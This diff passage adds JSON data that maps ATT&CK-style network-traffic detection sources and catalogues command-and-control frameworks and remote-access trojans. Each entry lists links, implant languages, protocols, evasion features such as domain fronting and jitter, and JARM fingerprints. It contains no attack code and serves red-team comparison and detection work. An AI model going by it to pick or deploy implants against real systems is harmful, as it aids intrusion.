"network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1149", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + }, + { + "technique_id": "T1153", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": NaN, + "definition": NaN, + "collection_layers": NaN, + "data_source_platform": NaN, + "data_component": NaN, + "description": NaN, + "source_data_element": NaN, + "relationship": NaN, + "target_data_element": NaN + } + ], + "external_reference": [NaN + ] + } + ], + "c2_data": [ + { + "name": "Alan", + "license": "Created Commons", + "price": "NA", + "github": "https://github.com/enkomio/AlanFramework", + "site": "", + "twitter": "@s4tan", + "evaluator": "@s4tan", + "date": "9/10/2021", + "version": "4", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET", + "implant": "C/Asm", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "No", + "gh_issues": "", + "notes": "All code is executed in memory" + }, + { + "name": "Ares", + "license": "NA", + "price": "NA", + "github": "https://github.com/sweetsoftware/Ares", + "site": "", + "twitter": "", + "evaluator": "@nas_bench", + "date": "5/27/2021", + "version": "N/A", + "implementation": "Python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "Web", + "dark_mode": "Yes and only dark mode", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "AsyncRAT-C#", + "license": "MIT", + "price": "NA", + "github": "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "1dd40d40d00040d1dc1dd40d1dd40d3df2d6a0c2caaa0dc59908f0d3602943", + "actively_maint": "No", + "slack": "", + "slack_members": "NA", + "gh_issues": "158", + "notes": "" + }, + { + "name": "AtlasC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/Gr1mmie/AtlasC2", + "site": "https://grimmie.net/atlasc2-carrying-the-weight-of-net-assemblies/", + "twitter": "@gr1mmie", + "evaluator": "@Adam_Mashinchi", + "date": "3/20/2022", + "version": "", + "implementation": "C#", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "C#", + "implant": "C#", + "multi_user": "", + "ui": "CLI", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "Yes", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "BabyShark", + "license": "NA", + "price": "NA", + "github": "https://github.com/UnkL4b/BabyShark", + "site": "", + "twitter": "@UnkL4b", + "evaluator": "@nas_bench", + "date": "6/8/2021", + "version": "Beta 1.0", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Bash", + "multi_user": "No", + "ui": "Web", + "dark_mode": "Yes and only dark mode", + "api": "No", + "windows": "No", + "linux": "Yes", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Badrats", + "license": "GNU GPL3", + "price": "NA", + "github": "https://gitlab.com/KevinJClark/badrats", + "site": "", + "twitter": "@GuhnooPlusLinux", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "BlackMamba", + "license": "MIT", + "price": "NA", + "github": "https://github.com/loseys/BlackMamba", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Brute Ratel", + "license": "Commercial", + "price": "$2,500", + "github": "", + "site": "https://bruteratel.com/", + "twitter": "", + "evaluator": "@NinjaParanoid", + "date": "3/19/2021", + "version": "0.3", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Golang", + "implant": "C, x64 Asm", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Bunraku", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/theshadowboxers/bunraku", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "C3", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/FSecureLABS/C3", + "site": "https://labs.f-secure.com/tools/c3/", + "twitter": "@FSecureLabs", + "evaluator": "@ajpc500", + "date": "6/30/2021", + "version": "1.3", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": ".NET Core", + "implant": "C++", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "Yes", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "- hunting for C3 - https://labs.f-secure.com/blog/hunting-for-c3/ - dropbox channel - https://labs.f-secure.com/blog/attack-detection-fundamentals-c2-and-exfiltration-lab-3 - UNC share file detection - https://labs.f-secure.com/blog/attack-detection-fundamentals-discovery-and-lateral-movement-lab-3/ - Printer C2 detection - https://labs.f-secure.com/blog/print-c2/ - Yara Rule from FireEye - https://www.fireeye.com/blog/threat-research/2021/05/shining-a-light-on-darkside-ransomware-operations.html - Yara rule for C3 in-memory shellcode - https://gist.github.com/ajpc500/9ae6eb427375438f906b0bf394813bc5 - C3 DLL usage (sigma rule) - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/process_creation_c3_load_by_rundll32.yml", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#c3 bloodhoundgang.herokuapp.com", + "slack_members": "320", + "gh_issues": "6", + "notes": "Asana - Dropbox - GoogleDrive - GitHub - Slack - O365 - LDAP - Printer - Unc Share File - MSSQL" + }, + { + "name": "CALDERA", + "license": "Apache 2", + "price": "NA", + "github": "https://github.com/mitre/caldera", + "site": "", + "twitter": "", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "2", + "implementation": "pip3", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Go", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "http://mitre-caldera.slack.com/", + "slack_members": "", + "gh_issues": "181", + "notes": "" + }, + { + "name": "Callidus", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3xpl01tc0d3r/Callidus", + "site": "", + "twitter": "@chiragsavla94", + "evaluator": "@chiragsavla94", + "date": "5/8/2020", + "version": "", + "implementation": "", + "how_to": "Yes", + "slingshot": "", + "kali": "", + "server": ".Net Core", + "implant": ".Net Core", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "None", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "O365 services: Outlook, OneNote, Teams" + }, + { + "name": "CHAOS", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/tiagorlampert/CHAOS", + "site": "", + "twitter": "@tiagorlampert", + "evaluator": "@leekirkpatrick4", + "date": "5/14/2020", + "version": "3", + "implementation": "Go", + "how_to": "", + "slingshot": "No", + "kali": "", + "server": "Go", + "implant": "Go", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "13", + "notes": "" + }, + { + "name": "Cobalt Strike", + "license": "Commercial", + "price": "$5,900", + "github": "", + "site": "https://www.cobaltstrike.com/", + "twitter": "", + "evaluator": "@TimMedin", + "date": "11/20/2019", + "version": "3.14", + "implementation": "binary", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Java", + "implant": "C", + "multi_user": "Yes", + "ui": "GUI", + "dark_mode": "", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "Yes", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Yes", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "Yes", + "attck_mapping": "Yes", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "NA", + "notes": "" + }, + { + "name": "Covenant", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/cobbr/Covenant", + "site": "https://cobbr.io/tags#covenant", + "twitter": "@cobbr_io", + "evaluator": "@jorgeorchilles", + "date": "10/6/2019", + "version": "0.3", + "implementation": "Docker", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "C#", + "implant": "C#", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "Yes", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "Yes", + "custom_profile": "Yes", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "Yes", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "#covenant bloodhoundhq.slack.com", + "slack_members": "665", + "gh_issues": "108", + "notes": "" + }, + { + "name": "DaaC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/crawl3r/DaaC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Dali", + "license": "MIT", + "price": "NA", + "github": "https://github.com/h0mbre/Dali", + "site": "https://h0mbre.github.io/Image_Based_C2_PoC/", + "twitter": "@h0mbre_", + "evaluator": "@jorgeorchilles", + "date": "12/24/2019", + "version": "POC", + "implementation": "pip3", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Python", + "multi_user": "No", + "ui": "CLI", + "dark_mode": "", + "api": "No", + "windows": "BYOI", + "linux": "BYOI", + "macos": "BYOI", + "tcp": "No", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "AES", + "stego": "Yes", + "proxy_aware": "No", + "domainfront": "No", + "custom_profile": "No", + "jitter": "No", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "", + "dashboard": "No", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "0", + "notes": "Uses Imgur" + }, + { + "name": "DarkFinger", + "license": "MIT", + "price": "NA", + "github": "https://github.com/hyp3rlinx/DarkFinger-C2", + "site": "", + "twitter": "@hyp3rlinx", + "evaluator": "@nas_bench", + "date": "7/4/2021", + "version": "POC", + "implementation": "Python", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Python", + "implant": "Batch", + "multi_user": "No", + "ui": "No", + "dark_mode": "No", + "api": "No", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "Yes", + "http": "No", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "No", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "No", + "key_exchange": "No", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "No", + "chaining": "No", + "logging": "No", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "No", + "blog": "Yes", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "DBC2", + "license": "NA", + "price": "NA", + "github": "https://github.com/Arno0x/DBC2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "No", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "Dropbox" + }, + { + "name": "DcRat", + "license": "MIT", + "price": "NA", + "github": "https://github.com/qwqdanchun/DcRat", + "site": "", + "twitter": "@qwqdanchun", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "Yes", + "linux": "No", + "macos": "No", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "DeimosC2", + "license": "MIT", + "price": "NA", + "github": "https://github.com/DeimosC2/DeimosC2", + "site": "", + "twitter": "@CharlesDardaman", + "evaluator": "@jasc22", + "date": "9/17/2020", + "version": "1.1.0 Beta", + "implementation": "Golang", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "Golang", + "implant": "Golang", + "multi_user": "Yes", + "ui": "Web", + "dark_mode": "Yes", + "api": "Yes", + "windows": "Yes", + "linux": "Yes", + "macos": "Yes", + "tcp": "Yes", + "http": "Yes", + "http2": "No", + "http3": "No", + "dns": "No", + "doh": "Yes", + "icmp": "No", + "ftp": "No", + "imap": "No", + "mapi": "No", + "smb": "No", + "ldap": "", + "key_exchange": "Encrypted Key Exchange", + "stego": "No", + "proxy_aware": "Yes", + "domainfront": "No", + "custom_profile": "No", + "jitter": "Yes", + "working_hours": "No", + "kill_date": "Yes", + "chaining": "Yes", + "logging": "Yes", + "in_wild": "No", + "attck_mapping": "No", + "dashboard": "Yes", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "00000000000000000041d00000041d9535d5979f591ae8e547c5e5743e5b64", + "actively_maint": "Yes", + "slack": "No", + "slack_members": "NA", + "gh_issues": "9", + "notes": "" + }, + { + "name": "Disctopia", + "license": "GNU GPL3", + "price": "NA", + "github": "https://github.com/3ct0s/disctopia-c2", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "Yes", + "c2_matrix_indicators": "Yes", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Eggshell", + "license": "GNU GPL2", + "price": "NA", + "github": "https://github.com/neoneggplant/EggShell", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "emp3r0r", + "license": "MIT", + "price": "NA", + "github": "https://github.com/jm33-m0/emp3r0r", + "site": "", + "twitter": "", + "evaluator": "Contribute", + "date": "", + "version": "", + "implementation": "", + "how_to": "", + "slingshot": "", + "kali": "", + "server": "", + "implant": "", + "multi_user": "", + "ui": "", + "dark_mode": "", + "api": "", + "windows": "", + "linux": "", + "macos": "", + "tcp": "", + "http": "", + "http2": "", + "http3": "", + "dns": "", + "doh": "", + "icmp": "", + "ftp": "", + "imap": "", + "mapi": "", + "smb": "", + "ldap": "", + "key_exchange": "", + "stego": "", + "proxy_aware": "", + "domainfront": "", + "custom_profile": "", + "jitter": "", + "working_hours": "", + "kill_date": "", + "chaining": "", + "logging": "", + "in_wild": "", + "attck_mapping": "", + "dashboard": "", + "blog": "", + "c2_matrix_indicators": "", + "jarm": "", + "actively_maint": "", + "slack": "", + "slack_members": "", + "gh_issues": "", + "notes": "" + }, + { + "name": "Empire", + "license": "BSD3", + "price": "NA", + "github": "https://github.com/BC-SECURITY/Empire", + "site": "", + "twitter": "@BCSecurity1", + "evaluator": "@jorgeorchilles", + "date": "1/30/2020", + "version": "3.0.5", + "implementation": "install.sh", + "how_to": "Yes", + "slingshot": "Yes", + "kali": "Yes", + "server": "Python", + "implant": "PowerShell", + "multi_user": 